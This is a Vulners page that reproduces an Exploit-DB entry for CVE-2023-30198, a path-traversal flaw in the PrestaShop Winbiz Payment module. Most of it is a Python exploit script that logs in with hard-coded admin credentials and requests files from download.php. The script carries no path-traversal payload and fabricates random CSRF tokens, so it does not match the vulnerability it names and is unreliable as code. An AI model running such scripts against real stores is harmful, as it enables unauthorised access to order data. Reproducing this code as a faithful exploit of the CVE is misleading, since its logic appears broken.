Vulners
Lucene search
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
🗓️ 26 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb🔗 www.exploit-db.com👁 294 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory | 26 Jun 202300:00 | – | zdt |
 | CVE-2023-30198 | 12 Jun 202317:15 | – | attackerkb |
 | PrestaShop 路径遍历漏洞 | 12 Jun 202300:00 | – | cnnvd |
 | PrestaShop path traversal vulnerability (CNVD-2023-49841) | 14 Jun 202300:00 | – | cnvd |
 | CVE-2023-30198 | 12 Jun 202300:00 | – | cve |
 | CVE-2023-30198 | 12 Jun 202300:00 | – | cvelist |
 | EUVD-2023-34623 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-30198 | 12 Jun 202317:15 | – | nvd |
 | PrestaShop Winbiz Payment Improper Limitation | 27 Jun 202300:00 | – | packetstorm |
 | Improper access control | 12 Jun 202317:15 | – | prion |
10
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198
import requests
import string
import random
# The base URL of the vulnerable site
base_url = "http://example.com"
# The URL of the login page
login_url = base_url + "/authentication.php"
# The username and password for the admin account
username = "admin"
password = "password123"
# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"
# The ID of the order to download
order_id = 1234
# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id
# The session cookies to use for the requests
session_cookies = None
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)
# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)
# Save the downloaded file to disk
with open(file_path, "wb") as f:
f.write(response.content)
# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2023 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.5
EPSS0.05682
SSVC